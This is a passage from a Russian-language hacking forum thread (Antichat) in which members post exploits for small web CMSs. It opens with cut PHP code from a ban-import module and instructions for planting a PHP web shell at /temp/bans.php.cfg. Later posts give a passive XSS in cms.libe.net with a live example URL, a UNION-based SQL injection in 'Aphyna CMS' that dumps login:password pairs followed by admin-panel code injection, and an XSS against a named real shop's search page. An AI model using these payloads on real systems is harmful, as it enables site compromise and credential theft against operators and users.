[/COLOR][COLOR="#007700"]if(![/COLOR][COLOR="#0000BB"]preg_match[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"/^[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}$/"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$steamid[/COLOR][COLOR="#007700"])) {[/COLOR][COLOR="#0000BB"]$status[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"failed"[/COLOR][COLOR="#007700"]]++; continue;}

[/COLOR][COLOR="#FF8000"]//search for a already existing permanent ban

[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT `player_ip` FROM `"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_bans` WHERE `player_id`='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$steamid[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"' AND `expired`=0"[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());

if([/COLOR][COLOR="#0000BB"]mysql_num_rows[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"])) {[/COLOR][COLOR="#0000BB"]$status[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"failed"[/COLOR][COLOR="#007700"]]++; continue;}

[/COLOR][COLOR="#FF8000"]//write ban to db

[/COLOR][COLOR="#0000BB"]$status[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"imported"[/COLOR][COLOR="#007700"]]++;

[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"INSERT INTO `"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_bans`(`player_ip`,`player_nick`,`admin_nick`,`ban_type`,`ban_reason`,`ban_created`,`ban_length`,`server_name`,`imported`)

VALUES

('"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$steamid[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"','"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$plnick[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"','"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"uname"[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"','SI','"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$reason_real[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"',"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$date[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]","[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$time[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]",'"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$server[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"',1)"[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());

} else {[/COLOR][COLOR="#0000BB"]$status[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"failed"[/COLOR][COLOR="#007700"]]++; continue;}

}

[/COLOR][COLOR="#0000BB"]fclose[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$handle[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#FF8000"]//del temp file

[/COLOR][COLOR="#0000BB"]unlink[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"temp/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]);

[/COLOR][/COLOR
Импортируем список банов "bans.php.cfg" с таким содержанием:

Код:
Code:
banid 0 STEAM_0:1:1234567891011121314151617
Чтобы после импорта наш шелл не удалился, нам пришлось добавить в куки " ' "(ковычку).

В итоге в modul_iexport.php при загрузки файла, скрипт завершает работу с ошибкой.

Шелл будет доступен по адресу:

http://[path]/temp/bans.php.cfg
 
Ответить с цитированием

  #8  
Старый 21.08.2010, 01:49
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388

Репутация: 87
По умолчанию
cms.libe.net => 0.5 - 0.91

Скачать: http://cms.libe.net/themen/DOWNLOAD.php

Пассив XSS

/template/cmslibenet/_suche.php

PHP код:
PHP:
[COLOR="#000000"]Stichwortsuche auf dieser Seite:

[/COLOR]" method="post" style="display:inline">

.....

$Suchbegriff=$HTTP_POST_VARS['Suchbegriff'];

if (!empty($Suchbegriff)){

echo "

X";[/COLOR] 
пример на оф сайте:

http://cms.libe.net/template/cmslibenet/_suche.php

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#DD0000"]">alert(112233)[/COLOR][/COLOR] 
путь: http://cms.libe.net/template/cmslibenet/_feedback.php
 
Ответить с цитированием

  #9  
Старый 30.08.2010, 14:02
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию
В интернете CMS не нашел.

Aphyna CMS

Код:
Code:
http://[host]/[path]/index.php?sec=katalog&[some text]page=%27+and+0+union+select+1,2,3,4,5,6,7,8,9,10%23
10 атрибут.

Код:
Code:
http://[hos]/[path]/index.php?sec=katalog&page=[some text]%27+and+0+union+select+1,2,3,4,5,6,7,8,9,GROUP_CONCAT%28concat_ws%28%27:%27,login,password%29%20separator%20%20%27@%27%29+FROM+users%23
http://[host]/[path]/admin

внутри:

http://[host]/[path]/admin/site_info.php

в левое поле пишем наш php код.
 
Ответить с цитированием

  #10  
Старый 21.09.2010, 16:45
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147

Репутация: 211
По умолчанию
Fashione E-Commerce Webshop

скачать

в поиске

http://www.mccabeshoes.com/index.php?page_id=search

вбиваем в поле поиска

Код:
Code:
alert('xss')
 
Ответить с цитированием
Ответ
Страница 41 из 52 « Первая < 31 37 38 39 40 41 42 43 44 45 51 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Библиотека SladerNon Болталка 17 05.02.2007 23:30



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ